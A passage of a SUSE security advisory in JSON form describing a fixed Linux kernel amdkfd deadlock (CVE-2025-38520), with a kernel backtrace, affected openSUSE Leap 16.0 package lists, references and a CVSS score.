"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Don\u0027t call mmput from MMU notifier callback\n\nIf the process is exiting, the mmput inside mmu notifier callback from\ncompactd or fork or numa balancing could release the last reference\nof mm struct to call exit_mmap and free_pgtable, this triggers deadlock\nwith below backtrace.\n\nThe deadlock will leak kfd process as mmu notifier release is not called\nand cause VRAM leaking.\n\nThe fix is to take mm reference mmget_non_zero when adding prange to the\ndeferred list to pair with mmput in deferred list work.\n\nIf prange split and add into pchild list, the pchild work_item.mm is not\nused, so remove the mm parameter from svm_range_unmap_split and\nsvm_range_add_child.\n\nThe backtrace of hung task:\n\n INFO: task python:348105 blocked for more than 64512 seconds.\n Call Trace:\n __schedule+0x1c3/0x550\n schedule+0x46/0xb0\n rwsem_down_write_slowpath+0x24b/0x4c0\n unlink_anon_vmas+0xb1/0x1c0\n free_pgtables+0xa9/0x130\n exit_mmap+0xbc/0x1a0\n mmput+0x5a/0x140\n svm_range_cpu_invalidate_pagetables+0x2b/0x40 [amdgpu]\n mn_itree_invalidate+0x72/0xc0\n __mmu_notifier_invalidate_range_start+0x48/0x60\n try_to_unmap_one+0x10fa/0x1400\n rmap_walk_anon+0x196/0x460\n try_to_unmap+0xbb/0x210\n migrate_page_unmap+0x54d/0x7e0\n migrate_pages_batch+0x1c3/0xae0\n migrate_pages_sync+0x98/0x240\n migrate_pages+0x25c/0x520\n compact_zone+0x29d/0x590\n compact_zone_order+0xb6/0xf0\n try_to_compact_pages+0xbe/0x220\n __alloc_pages_direct_compact+0x96/0x1a0\n __alloc_pages_slowpath+0x410/0x930\n __alloc_pages_nodemask+0x3a9/0x3e0\n do_huge_pmd_anonymous_page+0xd7/0x3e0\n __handle_mm_fault+0x5e3/0x5f0\n handle_mm_fault+0xf7/0x2e0\n hmm_vma_fault.isra.0+0x4d/0xa0\n walk_pmd_range.isra.0+0xa8/0x310\n walk_pud_range+0x167/0x240\n walk_pgd_range+0x55/0x100\n __walk_page_range+0x87/0x90\n walk_page_range+0xf6/0x160\n hmm_range_fault+0x4f/0x90\n amdgpu_hmm_range_get_pages+0x123/0x230 [amdgpu]\n amdgpu_ttm_tt_get_user_pages+0xb1/0x150 [amdgpu]\n init_user_pages+0xb1/0x2a0 [amdgpu]\n amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu+0x543/0x7d0 [amdgpu]\n kfd_ioctl_alloc_memory_of_gpu+0x24c/0x4e0 [amdgpu]\n kfd_ioctl+0x29d/0x500 [amdgpu]\n\n(cherry picked from commit a29e067bd38946f752b0ef855f3dfff87e77bec7)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38520",
"url": "https://www.suse.com/security/cve/CVE-2025-38520"
},
{
"category": "external",
"summary": "SUSE Bug 1248217 for CVE-2025-38520",
"url": "https://bugzilla.suse.com/1248217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
